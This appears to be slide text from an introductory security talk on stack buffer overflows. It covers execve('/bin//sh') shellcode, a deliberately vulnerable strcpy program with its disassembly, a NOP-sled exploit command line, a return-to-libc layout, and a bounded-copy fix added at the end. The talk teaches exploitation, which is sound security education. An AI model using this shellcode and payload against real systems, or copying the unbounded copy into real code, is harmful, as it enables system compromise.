whoami • System • http://symnoisy.tistory.com • www.facebook.com/jungbin.yu
0x02 Understand the flow (the principles) • Canary • BOF • RTL • ROP • DEP/NX • ASCII Armor • ASLR
0x03 Try it: registers? EAX EBP EBX ESP EIP ECX ESI EDX EDI
0x03 Try it: shellcode?
[gate@localhost it4u]$ cat sh.s
.global main
main:
    xor  %eax, %eax        # eax = 0
    push %eax              # NUL terminator for the string (byte 50 in the disassembly below)
    push $0x68732f2f       # "//sh"
    push $0x6e69622f       # "/bin"  -> esp now points at "/bin//sh"
    mov  %esp, %ebx        # ebx = filename
    xor  %ecx, %ecx        # ecx = 0
    push %ecx              # argv[1] = NULL (byte 51 in the disassembly below)
    push %ebx              # argv[0] = filename
    mov  %esp, %ecx        # ecx = argv
    xor  %edx, %edx        # edx = envp = NULL
    movb $0x0b, %al        # syscall 11 = execve
    int  $0x80
0x03 Try it: shellcode? (objdump -d output, bytes decoded in order)
08048398 <main>:
 8048398:  31 c0                 xor    %eax,%eax
 804839a:  50                    push   %eax
 804839b:  68 2f 2f 73 68        push   $0x68732f2f
 80483a0:  68 2f 62 69 6e        push   $0x6e69622f
 80483a5:  89 e3                 mov    %esp,%ebx
 80483a7:  31 c9                 xor    %ecx,%ecx
 80483a9:  51                    push   %ecx
 80483aa:  53                    push   %ebx
 80483ab:  89 e1                 mov    %esp,%ecx
 80483ad:  31 d2                 xor    %edx,%edx
 80483af:  b0 0b                 mov    $0xb,%al
 80483b1:  cd 80                 int    $0x80
 80483b3:  90                    nop
 80483b4:  90                    nop
 80483b5:  90                    nop
0x03 Try it: [source]
[gate@localhost it4u]$ cat vul.c
#include <stdio.h>
#include <string.h>   /* for strcpy() */
int main(int argc, char **argv){
    char buffer[256];
    strcpy(buffer, argv[1]);   /* no length check: argv[1] longer than 255 bytes overruns buffer */
    puts(buffer);
    return 0;
}
Frame layout (low to high address): buffer[256] | SFP | RET
0x03 Try it: [TIP] int main(int argc, char *argv[])
EX) ./test `perl -e 'print "ABCD"'` `perl -e 'print "EFGH"'`
argc: 3 (program name plus two arguments), argv: [0], [1], [2]
0x03 Try it: disassembly of main() in vul.c (gdb)
0x80483f8 <main>:       push   %ebp
0x80483f9 <main+1>:     mov    %esp,%ebp
0x80483fb <main+3>:     sub    $0x100,%esp            ; 0x100 = 256 bytes reserved for buffer
0x8048401 <main+9>:     mov    0xc(%ebp),%eax         ; argv
0x8048404 <main+12>:    add    $0x4,%eax
0x8048407 <main+15>:    mov    (%eax),%edx            ; argv[1]
0x8048409 <main+17>:    push   %edx
0x804840a <main+18>:    lea    0xffffff00(%ebp),%eax  ; buffer = ebp - 0x100
0x8048410 <main+24>:    push   %eax
0x8048411 <main+25>:    call   0x804833c <strcpy>
0x8048416 <main+30>:    add    $0x8,%esp
0x8048419 <main+33>:    lea    0xffffff00(%ebp),%eax
0x804841f <main+39>:    push   %eax
0x8048420 <main+40>:    call   0x804830c <puts>
0x8048425 <main+45>:    add    $0x4,%esp
0x8048428 <main+48>:    leave
0x8048429 <main+49>:    ret
Frame layout (low to high address): buffer[256] | SFP | RET
0x03 Try it: payload layout | NOP + SHELLCODE | SFP | &buf |
0x03 Try it:
[gate@localhost it4u]$ ./vul `perl -e 'print "\x90"x156, "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80", "\x90"x76, "SFPS", "RETS"'`
0x03 Try it: a target that rejects stack addresses in RET
#include <stdio.h>
#include <stdlib.h>
#include <string.h>   /* for strcpy() */

int main(int argc, char *argv[])
{
    char buffer[40];
    int i;

    if(argc < 2){
        printf("argv error\n");
        exit(0);
    }

    /* refuses a return address whose top byte is 0xbf, i.e. one that points into the stack */
    if(argv[1][47] == '\xbf')
    {
        printf("stack betrayed you!!\n");
        exit(0);
    }

    strcpy(buffer, argv[1]);   /* still unbounded: the overflow itself is untouched */
    printf("%s\n", buffer);
    return 0;
}
0x03 Try it: RTL layout | buf | SFP | &system | &exit | &/bin/sh |
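As an added example (not code from the slides), here is vul.c with the copy bounded to the buffer; the helper name copy_arg is an assumption. It removes the overflow at its source, whereas the one-byte test in the 40-byte program above only filters one kind of return address and leaves the unbounded strcpy() in place.

```c
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 256   /* same buffer size as vul.c */

/* copy_arg: hypothetical bounded replacement for the strcpy() in vul.c.
 * dstsz is the capacity of dst including the terminating NUL.
 * Returns 0 and fills dst when src fits; returns -1 and leaves dst empty
 * when it does not (rejecting rather than silently truncating). */
int copy_arg(char *dst, size_t dstsz, const char *src)
{
    size_t n;

    if (dst == NULL || src == NULL || dstsz == 0)
        return -1;

    /* Scan at most dstsz bytes, so an unterminated src cannot be over-read. */
    for (n = 0; n < dstsz && src[n] != '\0'; n++)
        ;
    if (n == dstsz) {        /* no room left for the NUL: too long */
        dst[0] = '\0';
        return -1;
    }
    memcpy(dst, src, n + 1); /* n + 1 <= dstsz, so the copy stays inside dst */
    return 0;
}

/* vul.c again, with an argc check and the bounded copy. Building it with
 * -fstack-protector-all adds the canary from 0x02 as a second line of defence. */
int main(int argc, char **argv)
{
    char buffer[BUF_SIZE];

    if (argc < 2) {
        fputs("usage: vul <string>\n", stderr);
        return 1;
    }
    if (copy_arg(buffer, sizeof buffer, argv[1]) != 0) {
        fprintf(stderr, "argument longer than %d bytes rejected\n", BUF_SIZE - 1);
        return 1;
    }
    puts(buffer);
    return 0;
}
```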
Thank you! Q&A +) Go to lots of conferences! http://symnoisy.tistory.com